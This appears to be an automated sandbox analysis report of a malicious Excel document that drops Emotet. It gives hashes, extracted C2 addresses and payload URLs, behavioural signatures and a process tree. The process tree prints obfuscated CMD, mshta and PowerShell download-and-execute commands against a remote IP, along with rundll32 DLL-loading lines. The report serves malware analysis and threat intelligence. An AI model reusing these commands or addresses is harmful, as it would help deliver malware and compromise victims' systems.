Analysis
-
max time kernel
121s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
28-01-2022 02:31
Behavioral task
behavioral1
Sample
EHZ816141086RS.xls
Resource
win7-en-20211208
General
-
Target
EHZ816141086RS.xls
-
Size
47KB
-
MD5
b297dd00c8d7b450371f60b877a4e4a0
-
SHA1
95e435fcfff850f3a176f43517344101c6eee845
-
SHA256
d3555d24f820403e1e49c53898a3c54f58077c83bd4738ad9a0e2210d457baae
-
SHA512
a4a84bc4784c0461a712622db68524a4a3eb5da176b4d1b18c87fcb65c6bc33498fad801e4803aa53f7ac00bb724bfcd1899710f27c497936eec0c5f54750317
Malware Config
Extracted
http://91.240.118.168/vvv/ppp/fe.html
Extracted
http://91.240.118.168/vvv/ppp/fe.png
Extracted
emotet
Epoch4
51.15.4.22:443
173.214.173.220:8080
212.237.5.209:443
192.254.71.210:443
216.158.226.206:443
162.243.175.63:443
212.24.98.99:8080
58.227.42.236:80
45.118.115.99:8080
104.251.214.46:8080
185.157.82.209:8080
46.55.222.11:443
188.40.137.206:8080
81.0.236.90:443
103.75.201.2:443
129.232.188.93:443
195.154.133.20:443
159.8.59.82:8080
79.172.212.216:8080
138.185.72.26:8080
200.17.134.35:7080
185.157.82.211:8080
209.59.138.75:7080
178.63.25.185:443
45.176.232.124:443
45.118.135.203:7080
164.68.99.3:8080
203.114.109.124:443
212.237.17.99:8080
50.116.54.215:443
131.100.24.231:80
212.237.56.116:7080
45.142.114.231:8080
162.214.50.39:7080
51.38.71.0:443
104.168.155.129:8080
107.182.225.142:8080
217.182.143.207:443
158.69.222.101:443
176.104.106.96:8080
207.38.84.195:8080
41.76.108.46:8080
110.232.117.186:8080
178.79.147.66:8080
173.212.193.249:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
CMD.EXEdescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1292 2732 CMD.EXE EXCEL.EXE -
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 30 1184 mshta.exe 38 1788 powershell.exe 40 1788 powershell.exe 47 2448 rundll32.exe 48 2448 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 1596 rundll32.exe 2208 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Nifktanavwovxcda\zmnio.puq rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4012 1184 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2732 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powershell.exeWerFault.exerundll32.exepid process 1788 powershell.exe 1788 powershell.exe 4012 WerFault.exe 4012 WerFault.exe 4012 WerFault.exe 4012 WerFault.exe 4012 WerFault.exe 4012 WerFault.exe 4012 WerFault.exe 4012 WerFault.exe 4012 WerFault.exe 4012 WerFault.exe 4012 WerFault.exe 4012 WerFault.exe 4012 WerFault.exe 4012 WerFault.exe 1788 powershell.exe 2448 rundll32.exe 2448 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 1788 powershell.exe Token: SeDebugPrivilege 4012 WerFault.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEpid process 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE 2732 EXCEL.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
EXCEL.EXECMD.EXEmshta.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 2732 wrote to memory of 1292 2732 EXCEL.EXE CMD.EXE PID 2732 wrote to memory of 1292 2732 EXCEL.EXE CMD.EXE PID 1292 wrote to memory of 1184 1292 CMD.EXE mshta.exe PID 1292 wrote to memory of 1184 1292 CMD.EXE mshta.exe PID 1184 wrote to memory of 1788 1184 mshta.exe powershell.exe PID 1184 wrote to memory of 1788 1184 mshta.exe powershell.exe PID 1788 wrote to memory of 1368 1788 powershell.exe cmd.exe PID 1788 wrote to memory of 1368 1788 powershell.exe cmd.exe PID 1368 wrote to memory of 1596 1368 cmd.exe rundll32.exe PID 1368 wrote to memory of 1596 1368 cmd.exe rundll32.exe PID 1368 wrote to memory of 1596 1368 cmd.exe rundll32.exe PID 1596 wrote to memory of 2208 1596 rundll32.exe rundll32.exe PID 1596 wrote to memory of 2208 1596 rundll32.exe rundll32.exe PID 1596 wrote to memory of 2208 1596 rundll32.exe rundll32.exe PID 2208 wrote to memory of 1632 2208 rundll32.exe rundll32.exe PID 2208 wrote to memory of 1632 2208 rundll32.exe rundll32.exe PID 2208 wrote to memory of 1632 2208 rundll32.exe rundll32.exe PID 1632 wrote to memory of 2448 1632 rundll32.exe rundll32.exe PID 1632 wrote to memory of 2448 1632 rundll32.exe rundll32.exe PID 1632 wrote to memory of 2448 1632 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\EHZ816141086RS.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\CMD.EXECMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://91.240.118.168/vvv/ppp/fe.html3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nifktanavwovxcda\zmnio.puq",LkVHpq8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Nifktanavwovxcda\zmnio.puq",DllRegisterServer9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1184 -s 16444⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\QWER.dllMD5
4739fcdd312a0287b93fe1e968b2aafe
SHA1f2aa748a0bf5f52e1919cb3b9e24ed5b65701a71
SHA256b7d873fd9a5c897cd22f36869f7c2fa335de5b14c898c86511c4bc7c7e0f2748
SHA51232a120e8170a09dd5313f057c9095cc49d57314b482e1f072ace7bdcf7c2c9d9574bb3a8ca6ba2ec8b729160051d5a7d393fcdb8c31455b022a5f4fe25247f76
-
\ProgramData\QWER.dllMD5
4739fcdd312a0287b93fe1e968b2aafe
SHA1f2aa748a0bf5f52e1919cb3b9e24ed5b65701a71
SHA256b7d873fd9a5c897cd22f36869f7c2fa335de5b14c898c86511c4bc7c7e0f2748
SHA51232a120e8170a09dd5313f057c9095cc49d57314b482e1f072ace7bdcf7c2c9d9574bb3a8ca6ba2ec8b729160051d5a7d393fcdb8c31455b022a5f4fe25247f76
-
\ProgramData\QWER.dllMD5
4739fcdd312a0287b93fe1e968b2aafe
SHA1f2aa748a0bf5f52e1919cb3b9e24ed5b65701a71
SHA256b7d873fd9a5c897cd22f36869f7c2fa335de5b14c898c86511c4bc7c7e0f2748
SHA51232a120e8170a09dd5313f057c9095cc49d57314b482e1f072ace7bdcf7c2c9d9574bb3a8ca6ba2ec8b729160051d5a7d393fcdb8c31455b022a5f4fe25247f76
-
memory/1788-277-0x0000016A229D0000-0x0000016A229F2000-memory.dmpFilesize
136KB
-
memory/1788-315-0x0000016A3AD43000-0x0000016A3AD45000-memory.dmpFilesize
8KB
-
memory/1788-403-0x0000016A3AD46000-0x0000016A3AD48000-memory.dmpFilesize
8KB
-
memory/1788-329-0x0000016A3B360000-0x0000016A3B3D6000-memory.dmpFilesize
472KB
-
memory/1788-311-0x0000016A3AD40000-0x0000016A3AD42000-memory.dmpFilesize
8KB
-
memory/1788-298-0x0000016A3ACE0000-0x0000016A3AD1C000-memory.dmpFilesize
240KB
-
memory/2208-598-0x00000000048B0000-0x00000000048D5000-memory.dmpFilesize
148KB
-
memory/2208-611-0x0000000005370000-0x0000000005395000-memory.dmpFilesize
148KB
-
memory/2208-609-0x00000000051D0000-0x00000000051F5000-memory.dmpFilesize
148KB
-
memory/2208-607-0x0000000005170000-0x0000000005195000-memory.dmpFilesize
148KB
-
memory/2208-605-0x0000000005110000-0x0000000005135000-memory.dmpFilesize
148KB
-
memory/2208-603-0x0000000004FB0000-0x0000000004FD5000-memory.dmpFilesize
148KB
-
memory/2208-601-0x0000000004DE0000-0x0000000004E05000-memory.dmpFilesize
148KB
-
memory/2448-617-0x0000000003480000-0x00000000034A5000-memory.dmpFilesize
148KB
-
memory/2448-619-0x0000000004E80000-0x0000000004EA5000-memory.dmpFilesize
148KB
-
memory/2732-115-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmpFilesize
64KB
-
memory/2732-118-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmpFilesize
64KB
-
memory/2732-128-0x00007FFD76670000-0x00007FFD76680000-memory.dmpFilesize
64KB
-
memory/2732-129-0x00007FFD76670000-0x00007FFD76680000-memory.dmpFilesize
64KB
-
memory/2732-121-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmpFilesize
64KB
-
memory/2732-117-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmpFilesize
64KB
-
memory/2732-116-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmpFilesize
64KB
-
memory/2732-663-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmpFilesize
64KB
-
memory/2732-664-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmpFilesize
64KB
-
memory/2732-666-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmpFilesize
64KB
-
memory/2732-665-0x00007FFD79DC0000-0x00007FFD79DD0000-memory.dmpFilesize
64KB